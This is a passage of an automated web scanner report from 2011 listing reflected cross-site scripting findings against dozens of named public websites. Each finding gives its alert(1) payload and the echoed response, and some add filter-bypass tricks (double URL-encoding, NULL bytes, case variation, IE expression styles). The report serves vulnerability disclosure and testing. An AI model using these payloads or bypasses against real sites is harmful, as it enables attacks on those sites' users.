HTTP/1.1 200 OK Cache-Control: private Content-Length: 29783 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Sat, 02 Apr 2011 15:48:57 GMT
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>Jobs not ads | Direct Employers Job Search Engine | JobCentral</title> ...[SNIP]... <a href="/index.asp?4fb07"><script>alert(1)</script>7bf12fb657b=1&adv=1" title="Add Advanced fields"> ...[SNIP]...
2.32. http://www.k12jobspot.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.k12jobspot.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 106fd'-alert(1)-'caca1b64cac was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
2.33. http://www.ktvb.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.ktvb.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e370f"-alert(1)-"013fb82cd55 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
2.34. http://www.ktvb.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.ktvb.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2575c"><script>alert(1)</script>adfdf415058 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
2.35. http://www.lef.org/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.lef.org
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ef0aa"-alert(1)-"cd85f2fc75d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Highest Qua ...[SNIP]... <script language="javascript" type="text/javascript"> var WebSiteBaseURL = "http://www.lef.org" var ThisPageFullURL = "http://www.lef.org/?ef0aa"-alert(1)-"cd85f2fc75d=1" </script> ...[SNIP]...
2.36. http://www.lyricsbox.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.lyricsbox.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 61b95"-alert(1)-"981aff1907e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 15:56:56 GMT Server: Apache/2.2.3 (Red Hat) P3P: policyref="/w3c/p3p.xml", CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Set-Cookie: session_views=2; path=/; domain=.lyricsbox.com Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Sat, 02 Apr 2011 15:56:56 GMT Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=iso-8859-1 Content-Length: 16046
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <HTML> <HEAD> <TITLE>Lyrics</TITLE> <META http-equiv="content-type" content="text/html;charset=iso-8859-1"> <META name=description ...[SNIP]... <script type="text/javascript">COMSCORE.beacon({c1:2,c2:"6772046",c3:"",c4:"www.lyricsbox.com/?61b95"-alert(1)-"981aff1907e=1",c5:"",c6:"",c15:""});</script> ...[SNIP]...
2.37. http://www.lyricsbox.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.lyricsbox.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9d840"><script>alert(1)</script>4546c14a081 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 15:56:37 GMT Server: Apache/2.2.3 (Red Hat) P3P: policyref="/w3c/p3p.xml", CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Set-Cookie: session_views=2; path=/; domain=.lyricsbox.com Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Sat, 02 Apr 2011 15:56:37 GMT Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=iso-8859-1 Content-Length: 16076
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <HTML> <HEAD> <TITLE>Lyrics</TITLE> <META http-equiv="content-type" content="text/html;charset=iso-8859-1"> <META name=description ...[SNIP]... <img src="http://b.scorecardresearch.com/p?c1=2&c2=6772046&c3=&c4=www.lyricsbox.com/?9d840"><script>alert(1)</script>4546c14a081=1&c5=&c6=&c15=&cj=1"/> ...[SNIP]...
2.38. http://www.mobile9.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.mobile9.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 31c0f"><ScRiPt>alert(1)</ScRiPt>544377bf744 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/ht ...[SNIP]... <a href="http://www.mobile9.com/?31c0f"><ScRiPt>alert(1)</ScRiPt>544377bf744=1&lang=cn"> ...[SNIP]...
2.39. http://www.musicloversgroup.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.musicloversgroup.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 42eb8"><script>alert(1)</script>c27d8eead00 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 42eb8\"><script>alert(1)</script>c27d8eead00 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head profile="http://gmpg.org/x ...[SNIP]... <a href="http://www.musicloversgroup.com/page/2/?42eb8\"><script>alert(1)</script>c27d8eead00=1" title="2 "> ...[SNIP]...
2.40. http://www.networkworld.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.networkworld.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9e505'-alert(1)-'f0b10da86c2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
2.41. http://www.newhomesource.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.newhomesource.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c58d"><script>alert(1)</script>f0bcbad861f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
2.42. http://www.onlyteensvids.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.onlyteensvids.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 14fcc"-alert(1)-"34a2a57f157 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
2.43. http://www.overthumbs.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.overthumbs.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7187b"><script>alert(1)</script>92b484c0150 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <script type="text/javascript" langu ...[SNIP]... <a href="/?7187b"><script>alert(1)</script>92b484c0150=2/"> ...[SNIP]...
2.44. http://www.pnwlocalnews.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.pnwlocalnews.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c2dcd"><script>alert(1)</script>b28e226b8a0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
2.45. http://www.pointstreak.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.pointstreak.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ae46c"><script>alert(1)</script>ffbc06d52b0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Server: Apache/1.3.41 (Unix) mod_gzip/1.3.26.1a PHP/5.2.11 X-Powered-By: PHP/5.2.11 P3P: CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa HISa OUR BUS IND PHY UNI COM NAV INT" Expires: Sat, 02-Apr-11 15:43:26 GMT Last-Modified: Sat, 02 Apr 2011 15:41:26 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 63634 be: hockey vclhockey: 1 Date: Sat, 02 Apr 2011 15:41:28 GMT X-Varnish: 3922358727 Age: 0 Via: 1.1 varnish Connection: keep-alive
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <meta http-equiv ...[SNIP]... <meta property="og:url" content="http://www.pointstreak.com/?ae46c"><script>alert(1)</script>ffbc06d52b0=1"/> ...[SNIP]...
2.46. http://www.puma.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.puma.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 93193"><script>alert(1)</script>fc4cc35bcda was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
2.47. http://www.rd.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.rd.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6a12c</script><script>alert(1)</script>5b92e3406d0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
2.48. http://www.recipelion.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.recipelion.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f9a01"><script>alert(1)</script>95cb7b9b1ad was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
2.49. http://www.rheumatologychannel.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.rheumatologychannel.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dcaac'-alert(1)-'588c71dd588 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
2.50. http://www.rheumatologychannel.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://www.rheumatologychannel.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 60e76"><a>c99028ccb1d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
2.51. http://www.securelinkcorp.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.securelinkcorp.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 3b91b<script>alert(1)</script>5ac33727974 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<html> <head> <title>Test JSP page</title> </head> <body bgcolor=white> <table border="0"> <tr> <td> <h1>Sample Application JSP Page</h1> This is the output of a JSP page that is part of the ...[SNIP]... <td align="left">3b91b<script>alert(1)</script>5ac33727974=1</td> ...[SNIP]...
2.52. http://www.selectsips.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.selectsips.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d948a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ecec1537ff92 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d948a"><script>alert(1)</script>cec1537ff92 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
2.53. http://www.slack-time.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.slack-time.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e8035"-alert(1)-"041f347b4e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/2000/REC-xhtml1-20000126/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" la ...[SNIP]... <script type="text/javascript"> // Note: it's important to keep these in separate script blocks COMSCORE.beacon({ c1: 2, c2: "6772046", c3: "", c4: "http://www.slack-time.com/?e8035"-alert(1)-"041f347b4e=1", // Replace this with the page URL that the site is on here, and also enter it into the <noscript> ...[SNIP]...
2.54. http://www.slack-time.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.slack-time.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 10219"><script>alert(1)</script>67eb9ac865a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/2000/REC-xhtml1-20000126/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" la ...[SNIP]... <img src="http://b.scorecardresearch.com/p?c1=2&c2=6772046&c3=&c4=http://www.slack-time.com/?10219"><script>alert(1)</script>67eb9ac865a=1&c5=&c6=&c15=&cj=1" /> ...[SNIP]...
2.55. http://www.spamfighter.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.spamfighter.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e7e39"><script>alert(1)</script>a2971b9f62f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
2.56. http://www.suny.edu/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.suny.edu
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e937"><script>alert(1)</script>a1544f91b96 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Connection: close Date: Sat, 02 Apr 2011 16:10:24 GMT Server: Microsoft-IIS/6.0 IISExport: This web site was exported using IIS Export v4.2 IISExport: This web site was exported using IIS Export v4.2 IISExport: This web site was exported using IIS Export v4.2 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
2.57. http://www.teenspot.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.teenspot.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 22954"><script>alert(1)</script>c68812124b4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<HTML><HEAD> <TITLE>TeenSpot.com - offers teen chat rooms, message boards, profiles, music, movies, and blogs.</TITLE> <META name="description" content="Offers teen chat rooms, message boards, p ...[SNIP]... <a href="http://www.teenspot.com/?22954"><script>alert(1)</script>c68812124b4=1&vo=6" target="_self"> ...[SNIP]...
2.58. http://www.teleprofitsnow.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.teleprofitsnow.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1be64"style%3d"x%3aexpression(alert(1))"cdfb73ef9b5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1be64"style="x:expression(alert(1))"cdfb73ef9b5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
HTTP/1.1 200 OK Cache-Control: private Content-Length: 11977 Content-Type: application/xhtml+xml; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET P3P: CP="DSP NON CUR OUR STP NAV COM STA UNI" Date: Sat, 02 Apr 2011 15:20:14 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> This Call Can ...[SNIP]... <input name="Contact0_referrerURL" type="hidden" value="http://www.teleprofitsnow.com/default.aspx?1be64"style="x:expression(alert(1))"cdfb73ef9b5=1" /> ...[SNIP]...
2.59. http://www.trekbikes.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.trekbikes.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 50712"-alert(1)-"3b2cb68c3da was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.0 404 Not Found Date: Sat, 02 Apr 2011 15:30:03 GMT Server: Apache/2 X-Powered-By: PHP/5.3.3 Cache-Control: max-age=0 Expires: Sat, 02 Apr 2011 15:30:03 GMT server-id: atlcfiweb02 Connection: close Content-Type: text/html; charset=utf-8 Content-Language: en
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
2.60. http://www.ub.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://www.ub.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b9b9"><a>2571ca6bec6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
2.61. http://www.uci.edu/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.uci.edu
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload faaf9"><script>alert(1)</script>5555b47234a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>University of California, Irvine</title ...[SNIP]... <a href="?faaf9"><script>alert(1)</script>5555b47234a=1&theme=0"> ...[SNIP]...
2.62. http://www.usedcars.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.usedcars.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ae949"style%3d"x%3aexpression(alert(1))"e0ddab0b7d5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ae949"style="x:expression(alert(1))"e0ddab0b7d5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
2.63. http://www.viagra.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.viagra.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8206d'-alert(1)-'06086a87a73 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" > <head> <title> VI ...[SNIP]... <!-- /* You may give each page an identifying name, server, and channel on the next lines. */ s.pageName='http://www.viagra.com/index.aspx?8206d'-alert(1)-'06086a87a73=1'; s.pageType=''; s.prop1='home'; s.prop3='home:viagra'; s.prop5=''; /* Conversion Variables */ s.campaign=''; s.events='7:pageview'; s.eVar3='home:viagra'; s.eVar5=''; s.eVar6=''; s.eVar18=''; s.eVa ...[SNIP]...
2.64. http://www.visitlasvegas.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.visitlasvegas.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload e85f7--><script>alert(1)</script>27040fdae7e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
2.65. http://www.worldstart.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.worldstart.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f6f98"><script>alert(1)</script>f7d2674b206 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f6f98\"><script>alert(1)</script>f7d2674b206 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"><head profile ...[SNIP]... <input type="hidden" name="location" value="http://www.worldstart.com/?f6f98\"><script>alert(1)</script>f7d2674b206=1" /> ...[SNIP]...
2.66. http://www.yankodesign.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.yankodesign.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 445df"><script>alert(1)</script>131a4f6060e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 445df\"><script>alert(1)</script>131a4f6060e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 55293'-alert(1)-'1523160a494 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
The value of the User-Agent HTTP header is copied into an HTML comment. The payload e6ebf--><script>alert(1)</script>4d07ef56e0f was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5a606'-alert(1)-'7b0131398cc was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload 91740<script>alert(1)</script>1a735c0a5ee was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
<title>Singles Dating :: Personals Site :: Women Seeking Men</title> <script language="javascript" type="text/javascript"> if (self != top) { if (document.im ...[SNIP]... <b>91740<SCRIPT>ALERT(1)</SCRIPT>1A735C0A5EE</b> ...[SNIP]...
